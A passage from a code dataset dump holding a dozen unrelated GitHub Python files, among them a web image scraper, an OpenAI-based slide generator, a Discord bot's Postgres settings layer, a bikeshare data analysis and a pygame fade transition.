response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image1 = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n image = image+image1\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n\n\n\ndef shachen():\n response = session.get(url= dust_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n\ndef air_p():\n image = []\n for url in air_pollution_url:\n response = session.get(url= url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image1 = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n image+=image1\n\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n","repo_name":"cycle13/demo","sub_path":"微信自动发送数据/淮阳/county_aqi.py","file_name":"county_aqi.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41231417405","text":"import io\nimport os\nimport random\nimport tempfile\n\nimport openai\nimport requests\nfrom PIL import Image\nfrom pptx.dml.color import RGBColor\nfrom pptx.util import Inches, Pt\n\nfrom utils import ask_chatgpt, get_dominant_colors, contrast_color, text_width, dim_image, adjust_contrast, apply_blur, \\\n apply_overlay\n\n\ndef generate_title(prompt, max_tokens=40):\n return ask_chatgpt(prompt, max_tokens)\n\n\ndef generate_bullet_points(prompt, max_tokens=300):\n response = ask_chatgpt(prompt, max_tokens)\n\n bullet_points = response.strip().split(\"\\n\")\n return bullet_points\n\n\ndef add_picture_from_pil_image(slide, pil_image, left, top, width, height):\n # Save the PIL image to a temporary in-memory file\n with tempfile.NamedTemporaryFile(suffix=\".png\", delete=False) as image_file:\n pil_image.save(image_file, \"PNG\")\n 
image_file.seek(0)\n        image_filename = image_file.name\n\n    # Add the temporary file to the slide\n    picture_shape = slide.Shapes.AddPicture(\n        FileName=image_filename,\n        LinkToFile=-1,  # Do not link to the file (embed the picture)\n        SaveWithDocument=-1,  # Save the picture with the document\n        Left=left,\n        Top=top,\n        Width=width,\n        Height=height,\n    )\n\n    # Pick a text colour that contrasts with the image's dominant colour\n    dominant_colors = get_dominant_colors(image_filename)\n    text_color = contrast_color(dominant_colors[0])\n\n    # Delete the temporary file from disk\n    os.remove(image_filename)\n\n    return text_color\n\n\ndef apply_background_manipulations(image_filename):\n    # Load the image\n    image = Image.open(image_filename)\n\n    # Adjust brightness, contrast, blur, and overlay\n    brightness_factor = 0.4\n    contrast_factor = 3\n    blur_radius = 2\n    overlay_color = (0, 0, 0, 255)\n    overlay_alpha = 0.3\n\n    image = dim_image(image, brightness_factor)\n    image = adjust_contrast(image, contrast_factor)\n    image = apply_blur(image, blur_radius)\n    image = apply_overlay(image, overlay_color, overlay_alpha)\n\n    # Save the modified image\n    image.save(image_filename)\n\n\ndef add_picture_from_pil_image_as_background(slide, presentation, pil_image):\n    # Save the PIL image to a temporary in-memory file\n    with tempfile.NamedTemporaryFile(suffix=\".png\", delete=False) as image_file:\n        pil_image.save(image_file, \"PNG\")\n        image_file.seek(0)\n        image_filename = image_file.name\n\n    apply_background_manipulations(image_filename)\n\n    # Set the slide background image\n    pic = slide.shapes.add_picture(image_filename, 0, 0, width=presentation.slide_width,\n                                   height=presentation.slide_height)\n\n    # This moves it to the background\n    slide.shapes._spTree.remove(pic._element)\n    slide.shapes._spTree.insert(2, pic._element)\n\n    # Delete the temporary file from disk\n    os.remove(image_filename)\n    return\n\n\nasync def add_related_picture(slide, presentation, prompt):\n    # Generate the image using DALL-E\n    response = openai.Image.create(prompt=prompt)\n\n    # Get the image URL from the response\n    image_url = response[\"data\"][0][\"url\"]\n\n    # Download the image from the URL\n    image_data = requests.get(image_url).content\n\n    # Load the image data into a PIL Image object\n    pil_image = Image.open(io.BytesIO(image_data))\n\n    add_picture_from_pil_image_as_background(slide, presentation, pil_image)\n    return\n\n\nasync def generate_slide(presentation, topic):\n    prompt = f\"Change the question: \\\"'{topic}'\\\" to a verbal noun title for an article. Start your title here:\"\n    title = generate_title(prompt).replace('\"', '').replace('\\n', '')\n    print(f\"Title: {title}\")\n\n    prompt = f\"Please provide a summary and interesting information about the topic \\\"{title}\\\" using bullet points. Use the following format for your response:\" \\\n             f\"\\n• Main Point 1\\n--• Sub-point 1.1\\n--• Sub-point 1.2\\n• Main Point 2\\n\\nStart your response here:\"\n    bullet_points = generate_bullet_points(prompt)\n\n    # Add a slide to the presentation\n    slide_layout = presentation.slide_layouts[5]\n    slide = presentation.slides.add_slide(slide_layout)\n\n    # Add background image that is related to the topic\n    await add_related_picture(slide, presentation, title)\n\n    # Set the slide title\n    title_shape = slide.shapes.title\n    title_shape.text = title\n    title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor(255, 255, 255)\n\n    # Set the initial font size\n    font_size = Pt(44)\n\n    # Calculate the text width based on the initial font size\n    text_width_pixels = text_width(title_shape.text, int(font_size))\n\n    # Adjust the font size if the title exceeds the slide width\n    slide_width_pixels = Inches(13)  # For 16:9\n\n    while text_width_pixels > slide_width_pixels:\n        font_size -= Pt(1)\n        text_width_pixels = text_width(title_shape.text, int(font_size))\n\n    # Apply the adjusted font size to the title\n    title_shape.text_frame.paragraphs[0].runs[0].font.size = font_size\n    title_shape.text_frame.paragraphs[0].runs[0].font.name = 'Goudy Old Style (Headings)'\n\n    # Add bullet points to the slide\n    left = Inches(1.3)\n    top = Inches(1.2)\n    width = Inches(random.randint(9, 10))  # Set the width to the random slide width\n    height = Inches(6)\n\n    tx_box = slide.shapes.add_textbox(left, top, width, height)\n    tf = tx_box.text_frame\n\n    # Adjust the text box properties\n    tf.word_wrap = True  # Enable word wrapping\n    tf.auto_size = 0  # Disable auto resizing\n    tf.margin_left = Inches(0.1)  # Set left margin\n    tf.margin_right = Inches(0.1)  # Set right margin\n    tf.margin_top = Inches(0.1)  # Set top margin\n    tf.margin_bottom = Inches(0.1)  # Set bottom margin\n\n    # Add nested bullet points to the text of the presentation\n    for point in bullet_points:\n        if point.startswith(\"--\"):\n            p = tf.add_paragraph()\n            p.text = point.strip(\"-\")\n            p.level = 1\n        else:\n            p = tf.add_paragraph()\n            p.text = u'\\u2794' + ' ' + point.strip(\"•\")\n            p.level = 0\n            p.font.name = \"Avenir Next LT Pro (Body)\"\n            p.font.italic = True\n            p.space_before = Pt(10)\n\n        p.font.color.rgb = RGBColor(255, 255, 255)\n\n    return\n","repo_name":"kfirtaizi/EndlessPresentation","sub_path":"slide_generator.py","file_name":"slide_generator.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
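The generate_slide function in the slide_generator.py record above shrinks the title font one point at a time until the measured text width fits the slide. Stripped of python-pptx, the loop reduces to the sketch below; text_width here is a crude stand-in for the utils.text_width helper imported at the top of that file, assuming an average glyph width of 0.6 em:

```python
def text_width(text: str, font_size: int) -> float:
    # Stand-in for utils.text_width: assume each glyph is ~0.6 em wide.
    return len(text) * font_size * 0.6

def fit_font(text: str, start_size: int, max_width: float, min_size: int = 10) -> int:
    """Shrink the font one point at a time until the text fits."""
    size = start_size
    while text_width(text, size) > max_width and size > min_size:
        size -= 1
    return size

print(fit_font("A fairly long presentation title", 44, 600))  # -> 31
```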
{"seq_id":"14766188512","text":"my_file = open('file.txt', 'w')\nmy_file.write('Hello Python')\nmy_file.close()\n\nnew_my_file = open(\"file.txt\", \"a\")\nnew_my_file.write(\"Bye Python\")\nnew_my_file.close()\n\nread_file = open(\"file.txt\")\nprint(read_file.read())\nread_file.close()\n\n\n#If the file exists, open and read it. When leaving the with block the file is closed automatically, so there is no need to call close().\nwith open(\"new.txt\") as file:\n    print(file.read())\n\n\n","repo_name":"hilaldiler/2019oyk-yaz-python","sub_path":"basic/file_operations.py","file_name":"file_operations.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
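The file_operations.py record above walks through 'w' (create or truncate), 'a' (append) and a with block, which closes the file on leaving the block without an explicit close(). The same flow, condensed into one self-contained sketch:

```python
with open("demo.txt", "w") as f:   # 'w' creates the file or truncates it
    f.write("Hello Python\n")

with open("demo.txt", "a") as f:   # 'a' appends to the end of the file
    f.write("Bye Python\n")

with open("demo.txt") as f:        # default mode 'r'; closed automatically on exit
    print(f.read())
```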
{"seq_id":"72238871506","text":"import numpy as np\nfrom visdom import Visdom\n\nviz = Visdom()\n\ndef contour(data, title):\n    viz.contour(\n        X=np.array(data),\n        win=title,\n        opts=dict(\n            title=title\n        )\n    )\n\ndef plot_V(V):\n    contour(V, 'Values - Car Rental')\n\ndef plot_P(P):\n    contour(P, 'Policy - Car Rental')\n","repo_name":"BCHoagland/Sutton-and-Barto","sub_path":"04 - Dynamic Programming/car_rental/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"2002117052","text":"from typing import Union, Optional, List, Tuple, Set\nfrom discord import Guild\nfrom dataclasses import fields\nfrom ..guild_settings import GuildSettings\n\nfrom ..async_list import AsyncList, async_list\nfrom .._connection import _PostgresConnection\n\n\nclass GuildSettingsMixin(_PostgresConnection):\n    @async_list\n    async def alias_guilds(self) -> AsyncList:\n        await self.cur.execute(\n            \"SELECT guild_id FROM guild_settings WHERE is_alias_server=true\"\n        )\n        return [gid for gid, in await self.cur.fetchall()]\n\n    async def personas_guilds(self) -> Set[str]:\n        await self.cur.execute(\n            \"SELECT guild_id FROM guild_settings WHERE enable_personas=true\"\n        )\n        return {str(gid) for gid, in await self.cur.fetchall()}\n\n    @async_list\n    async def guild_prefixes(self) -> AsyncList:\n        await self.cur.execute(\n            \"SELECT guild_id, prefix FROM guild_settings\"\n        )\n        return await self.cur.fetchall()\n\n    @async_list\n    async def guild_settings(self) -> AsyncList:\n        await self.cur.execute(\n            \"SELECT guild_id, prefix, locale, max_guildwide_emotes, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, enable_pings, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection FROM guild_settings\"\n        )\n        results = await self.cur.fetchall()\n        return [GuildSettings(*i) for i in results]\n\n    async def get_guild_settings(self, guild_id: Union[Guild, int]) -> Optional[GuildSettings]:\n        await self.cur.execute(\n            \"SELECT guild_id, prefix, locale, max_guildwide_emotes, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, enable_pings, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection FROM guild_settings WHERE guild_id=%(guild_id)s\",\n            parameters={\"guild_id\": guild_id}\n        )\n        results = await self.cur.fetchall()\n        if not results:\n            return None\n        return GuildSettings(*results[0])\n\n    async def get_guild_rank(self, max_emotes: int) -> int:\n        await self.cur.execute(\n            \"SELECT count(*) FROM guild_settings WHERE max_guildwide_emotes > %(max_emotes)s\",\n            parameters={\"max_emotes\": max_emotes}\n        )\n        results = await self.cur.fetchall()\n        return results[0][0]\n\n    async def get_top_10_rank(self) -> List[Tuple[int, int]]:\n        await self.cur.execute(\n            \"SELECT guild_id, max_guildwide_emotes FROM guild_settings ORDER BY max_guildwide_emotes DESC LIMIT 10\"\n        )\n        return await self.cur.fetchall()\n\n    async def 
set_guild_settings(self, guild_settings: GuildSettings):\n await self.cur.execute(\n \"INSERT INTO guild_settings (guild_id, prefix, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, locale, enable_pings, max_guildwide_emotes, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection) VALUES \"\n \"(%(guild_id)s, %(prefix)s, %(nitro_role)s, %(boost_channel)s, %(boost_role)s, %(audit_channel)s, %(enable_stickers)s, %(enable_nitro)s, %(enable_replies)s, %(is_alias_server)s, %(locale)s, %(enable_pings)s, %(max_guildwide_emotes)s, %(enable_user_content)s, %(enable_personas)s, %(enable_dashboard_posting)s, %(enable_phish_detection)s)\"\n 'ON CONFLICT (guild_id) DO UPDATE SET (prefix, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, \"locale\", enable_pings, max_guildwide_emotes, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection) = '\n \"(EXCLUDED.prefix, EXCLUDED.nitro_role, EXCLUDED.boost_channel, EXCLUDED.boost_role, EXCLUDED.audit_channel, EXCLUDED.enable_stickers, EXCLUDED.enable_nitro, EXCLUDED.enable_replies, EXCLUDED.is_alias_server, EXCLUDED.locale, EXCLUDED.enable_pings, EXCLUDED.max_guildwide_emotes, EXCLUDED.enable_user_content, EXCLUDED.enable_personas, EXCLUDED.enable_dashboard_posting, EXCLUDED.enable_phish_detection)\",\n parameters={field.name: getattr(guild_settings, field.name) for field in fields(guild_settings)}\n )\n\n async def delete_guild_settings(self, guild_id: int):\n await self.cur.execute(\n \"DELETE FROM guild_settings WHERE guild_id=%(guild_id)s\",\n parameters={\"guild_id\": guild_id}\n )\n","repo_name":"NQN-Discord/sql_helper","sub_path":"sql_helper/mixins/guild_settings.py","file_name":"guild_settings.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70901253907","text":"class Solution:\n def finalString(self, s: str) -> str:\n temp = []\n for i in range(len(s)):\n if s[i] == 'i':\n temp.reverse()\n else:\n temp.append(s[i])\n\n return ''.join(temp)\n\nsol = Solution()\nprint(sol.finalString(\"poiinter\"))\n","repo_name":"anujvaghani0/DSA-Python","sub_path":"String/FaultyKeyboard.py","file_name":"FaultyKeyboard.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21436659660","text":"# prepro.py\n# Preprocesses an AST.\nfrom .ast import *\nfrom .parse import Parser\nimport os.path as path\n\ndef _path_find(import_path: List[str], filename: str):\n for d in import_path:\n if not path.isdir(d): continue\n fullpath = path.join(d, filename)\n if not path.isfile(fullpath): continue\n return fullpath\n\nclass Preprocess:\n def __init__(self, path: str, search_dirs: List[str], ast: Source, ignore=None):\n if ignore is None:\n ignore = []\n self.path = path\n self.search_dirs = search_dirs\n self.ast = ast\n self.ignore = ignore\n\n def preprocess(self) -> Source:\n src = []\n rm = []\n for top in self.ast:\n # skip non-imports\n if type(top) is not Import: continue\n # skip imports we've already visited\n inc_path = self.deduce_path(top.path)\n if inc_path is None:\n raise PreprocessImportError(top.range, top.path, self.search_dirs)\n # read and parse the source of the import file\n abs_include = path.abspath(inc_path)\n if abs_include in self.ignore:\n rm += 
[top]\n continue\n self.ignore += [abs_include]\n with open(inc_path) as fp:\n source = fp.read()\n try:\n parser = Parser(source, inc_path)\n ast = parser.parse()\n prepro = Preprocess(inc_path, self.search_dirs, ast, self.ignore)\n src += prepro.preprocess()\n src += prepro.ast\n except ParseError as e:\n raise ChainedError(inc_path, e)\n except ChainedError as e:\n raise ChainedError(inc_path, e)\n rm += [top]\n for r in rm:\n self.ast.remove(r)\n return src\n\n def deduce_path(self, name: str) -> Any:\n # if it's an absolute path that exists, just use that\n if path.isabs(name):\n return name\n inc_dir = path.dirname(name)\n for prefix in [inc_dir] + self.search_dirs:\n extd = path.join(prefix, name)\n if path.isfile(extd):\n return extd\n return None\n","repo_name":"alekratz/sbl-py","sub_path":"sbl/syntax/prepro.py","file_name":"prepro.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11147743227","text":"import time\nimport pandas as pd\nimport numpy as np\n\n\n\ncity_data_dictionary = {\n \"chicago\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\chicago.csv\",\n \"new york city\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\new_york_city.csv\",\n \"washington\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\washington.csv\"\n}\n\npd.set_option(\"display.max_columns\", None)\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Welcome to egFWD - Data Professional Track - December 2021 Cohort')\n print('First Project: Explore US Bikeshare')\n print('By AHMED ELSAWY, on 13-12-2021')\n print(\"#\"*50)\n print('\\nLet\\'s explore some US bikeshare data concerning three cities: chicago, new york city and washington.\\n')\n\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n cities_list = ['chicago', 'new york city', 'washington']\n city_input = input(\"Please, select a city:\\n'chicago', 'new york city' or 'washington'\\n=> \").lower()\n if city_input not in cities_list:\n print(\"Whoops! Invalid city!\")\n else:\n break\n\n # get user input for month (all, january, february, ... , june)\n while True:\n months_list = ['January', 'February', 'March', 'April', 'May', 'June']\n month_input = input(\"Please, select a month or type 'all' to skip months filter:\\n\"\n \" 'january', 'february', 'march', 'april', 'may', 'june'\\n=> \").capitalize()\n if month_input not in months_list and month_input != \"All\":\n print(\"Whoops! Invalid month!\")\n else:\n break\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n days_list = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n day_input = input(\"Please, select a day or type 'all' to skip days filter:\\n\"\n \" 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'\\n=> \").capitalize()\n if day_input not in days_list and day_input != \"All\":\n print(\"Whoops! 
Invalid day!\")\n else:\n break\n\n print('-'*40)\n return city_input, month_input, day_input\n\n\ndef load_data(city_input, month_input, day_input):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city_input - name of the city to analyze\n (str) month_input - name of the month to filter by, or \"all\" to apply no month filter\n (str) day_input - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n df = pd.read_csv(city_data_dictionary[city_input])\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.strftime('%B')\n df['day_of_week'] = df['Start Time'].dt.day_name()\n # filter by month if applicable\n if month_input != \"All\":\n # filter by month to create the new dataframe\n df = df[df['month'] == month_input]\n\n # filter by day of week if applicable\n if day_input != \"All\":\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day_input] # capitalize first letter of input to match results obtained from line 77\n\n return df\n\n\ndef display_five_lines_of_raw_data(df):\n \"\"\"\n According to the project rubric:\n Raw data is displayed upon request by the user in the following manner:\n -script should prompt the user if they want to see 5 lines of raw data,\n -Display that data if the answer is 'yes',\n -Continue iterating these prompts and displaying the next 5 lines of raw data at each iteration,\n -Stop the program when the user says 'no' or there is no more raw data to display.\n -Tips: you can implement the while loop and track the row index in order to display the continuous raw data.\n \"\"\"\n print(\"Great! raw data is ready according to your previous preferences.\")\n print(\"If you wish to display 5 lines of the raw data, please let me know.\")\n num_of_lines = 0\n while True:\n user_feedback = input(\"Display next 5 lines of raw data? type yes or no => \").lower()\n if user_feedback == \"no\":\n break\n #Stop the loop when the user says 'no'.\n\n if user_feedback != \"no\" and user_feedback != \"yes\":\n print(\"Whoops! 
Invalid Choice!\")\n continue\n\n if user_feedback == \"yes\":\n print(df[num_of_lines:num_of_lines + 5])\n num_of_lines += 5\n\n if num_of_lines >= len(df.index): #or num_of_lines >= df.shape[0]:# Both are synonymous\n print(\"All lines already displayed.\\nNo More Lines To Display.\")\n break\n #Stop the loop when there is no more raw data to display.\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n print(\"The most common month is: \", df['month'].value_counts().idxmax())\n\n\n # display the most common day of week\n print(\"The most common day of week is: \", df['day_of_week'].value_counts().idxmax())\n\n\n\n # display the most common start hour\n print(\"The most common start hour is: \", df['Start Time'].dt.hour.value_counts().idxmax())\n\n\n print(f\"\\nThis calculation took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print(\"The most commonly used start station is: \", df['Start Station'].value_counts().idxmax())\n\n\n # display most commonly used end station\n print(\"The most commonly used end station is: \", df['End Station'].value_counts().idxmax())\n\n\n # display most frequent combination of start station and end station trip\n df[\"Combination of Start and End Stations\"] = df['Start Station'] + \" => \" + df['End Station']\n print(\n \"The most frequent trip ( Start => End ) is : (\",\n df[\"Combination of Start and End Stations\"].value_counts().idxmax(), \")\"\n )\n\n\n print(f\"\\nThis took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time = ttt\n ttt_sec = df[\"Trip Duration\"].sum()\n ttt_min = ttt_sec / 60\n ttt_hrs = ttt_min / 60\n ttt_days = ttt_hrs / 24\n print(f\"Total Travel Time = {ttt_sec} seconds, \"\n f\"or about {ttt_min} minutes, or about {ttt_hrs} hours, or about {ttt_days} days.\")\n\n\n\n # display mean travel time = mtt\n mtt_sec = df[\"Trip Duration\"].mean()\n mtt_min = mtt_sec / 60\n mtt_hrs = mtt_min / 60\n mtt_days = mtt_hrs / 24\n print(f\"Mean Travel Time = {mtt_sec} seconds, \"\n f\"or about {mtt_min} minutes, or about {mtt_hrs} hours, or about {mtt_days} days.\")\n\n\n print(f\"\\nThis took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print(\"Counts of user types: \")\n print(df[\"User Type\"].value_counts())\n print(\"-\"*20)\n\n # Display counts of gender\n if \"Gender\" in df:\n print(\"Counts of gender: \")\n print(df[\"Gender\"].value_counts())\n print(\"-\" * 20)\n\n # Display earliest, most recent, and most common year of birth\n if \"Birth Year\" in df:\n print(\"Earliest year of birth: \", df[\"Birth Year\"].min())\n print(\"Most recent year of birth: \", df[\"Birth Year\"].max())\n print(\"Most common year of birth: \", df[\"Birth Year\"].mode()[0])\n print(\"-\" * 20)\n\n print(f\"\\nThis took 
{time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef main():\n while True:\n city_input, month_input, day_input = get_filters()\n df = load_data(city_input, month_input, day_input)\n\n display_five_lines_of_raw_data(df)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? type yes or no.\\n=> ')\n if restart.lower() != 'yes':\n print(\"Thank You! See You In Next Projects *_*\")\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ahmedelsawy-as/Project-Explore-US-Bikeshare-Data","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7096022185","text":"def super_func(*args):\n print(args)\n print(*args)\n return sum(args)\nsuper_func(1, 2, 3, 4, 5, 6)\n\ndef super_func1(*args, **kwargs):\n print(args)\n print(kwargs)\n total = 0\n for item in kwargs.values():\n total += item\n return sum(args) + total\nprint(super_func1(1, 2, 3, 4, 5, 6, num1=15, num2=20, num3= 10))\n\n#Rule : parameter, *args, default parameter, **kwargs\n\ndef highest_even(list):\n even = []\n for item in list:\n if item % 2 == 0:\n even.append(item)\n return max(even)\n\nprint(highest_even([10, 3, 4, 6, 8, 11]))\n\ntotal = 0\ndef count():\n global total\n total += 1\n return total\ncount()\ncount()\nprint(count())\n\ndef outer():\n x = 'local'\n def inner():\n nonlocal x\n x = 'nonlocal'\n print('inside : ', x)\n inner()\n print('outer : ', x)\n\nouter()\ny = 'Hello'[0]\nprint(y)\n","repo_name":"mohmutho/fund_python","sub_path":"args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74178195024","text":"\r\n\r\n#https://stackoverflow.com/questions/46184239/python-extract-a-page-from-a-pdf-as-a-jpeg\r\nimport os, subprocess,time\r\n\r\npdf_dir = r\"D:\\mgw_CFpermitsFD_OMM\\Python_Scripts\\test\"\r\nos.chdir(pdf_dir)\r\n\r\npdftoppm_path = r\"C:\\Program Files\\poppler-0.68.0\\bin\\pdftoppm.exe\"\r\n\r\n\r\nfor pdf_file in os.listdir(pdf_dir):\r\n\r\n if pdf_file.endswith(\".pdf\"):\r\n outfile = pdf_file[0:-4]\r\n\r\n #subprocess.Popen('\"%s\" -jpeg %s ye' % (pdftoppm_path, pdf_file))\r\n subprocess.Popen('\"{}\" -jpeg {} {}'.format(pdftoppm_path, pdf_file,outfile))\r\n print(\"successfully converted\")\r\ntime.sleep(3) \r\n\r\n\r\nfor jpg in os.listdir(pdf_dir):\r\n if jpg.endswith(\".jpg\"):\r\n new_jpg = jpg[0:-6]+\".jpg\"\r\n print(new_jpg)\r\n os.rename(pdf_dir+\"\\\\\"+jpg,pdf_dir+\"\\\\\"+new_jpg)\r\n \r\n print(pdf_dir+\"\\\\\"+jpg,pdf_dir+\"\\\\\"+new_jpg)\r\n ","repo_name":"yhaung/Pythoncodes_in_CF_database_project","sub_path":"pdf2image.py","file_name":"pdf2image.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73278624145","text":"\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport cv2\nimport datetime\nfrom model_final_mv3 import DABLNet\nimport statistics as stat\nfrom visualize import get_color_pallete\nimport os\nparse = argparse.ArgumentParser()\nparse.add_argument(\n '--ckpt',\n dest='ckpt',\n type=str,\n default='./res/model_non_local.pth',)\n\nparse.add_argument(\n '--data_dir',\n dest='data_dir',\n type=str,\n 
default='./val/munster',)\n\nparse.add_argument(\n '--save_dir',\n dest='save_dir',\n type=str,\n default='./outputs',)\n\nargs = parse.parse_args()\nos.makedirs(args.save_dir, exist_ok=True)\n\n# define model\nnet = DABLNet(n_classes=19)\nnet.load_state_dict(torch.load(args.ckpt, map_location='cpu'))\nnet.eval()\nnet.cuda()\n\n# prepare data\nto_tensor = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\nimage_list = os.listdir(args.data_dir)\nfor image in image_list:\n im = to_tensor(Image.open(os.path.join(args.data_dir, image)).convert('RGB')).unsqueeze(0).cuda()\n output = net(im)\n pred = torch.argmax(output[0], 1).squeeze(0).cpu().data.numpy()\n # colorize the predicted class-index map\n mask = get_color_pallete(pred, 'citys')\n save_path = os.path.join(args.save_dir, image)\n #cv2.imwrite(save_path, pred)\n mask.save(save_path)","repo_name":"dronefreak/CABiNet","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} {"seq_id":"9452989280","text":"import pygame\r\nfrom pymphony.colors import BLACK\r\n\r\n\r\nclass Cutscene:\r\n \"\"\" the base class for future cutscenes. \"\"\"\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass FadeIn:\r\n \"\"\" a fade to black and back \"\"\"\r\n\r\n # speed we fade in/out\r\n speed = 20\r\n\r\n # how many frames we linger on\r\n linger = 0\r\n hold_cou = 0\r\n\r\n def __init__(self, screen, gsobj):\r\n self.screen = screen\r\n self.screct = self.screen.get_rect()\r\n\r\n self.gsobj = gsobj\r\n\r\n self.image = pygame.Surface(self.screct.size)\r\n self.image.fill(BLACK)\r\n\r\n self.image.set_alpha(0)\r\n\r\n # are we fading in or out?\r\n self.fade_in = True\r\n\r\n # is this transition done or not?\r\n self.done = False\r\n\r\n def update(self):\r\n \"\"\" update our image's alpha value \"\"\"\r\n if self.fade_in:\r\n self.image.set_alpha(self.image.get_alpha() + self.speed)\r\n elif self.image.get_alpha() > 0:\r\n if self.hold_cou >= self.linger:\r\n self.image.set_alpha(self.image.get_alpha() - self.speed)\r\n else:\r\n self.hold_cou += 1\r\n else:\r\n self.finish()\r\n\r\n if self.image.get_alpha() >= 255:\r\n self.fade_in = False\r\n\r\n def finish(self):\r\n \"\"\" called when the transition is finished \"\"\"\r\n self.done = True\r\n\r\n def draw(self):\r\n \"\"\" draw the image on the screen \"\"\"\r\n self.screen.blit(self.image, (0, 0))\r\n\r\n def reset(self):\r\n \"\"\" reset the transition \"\"\"\r\n self.done = False\r\n self.fade_in = True\r\n\r\n\r\nclass CutTo:\r\n \"\"\" cut to black for a few seconds \"\"\"\r\n # how many frames we linger on\r\n linger = 5\r\n 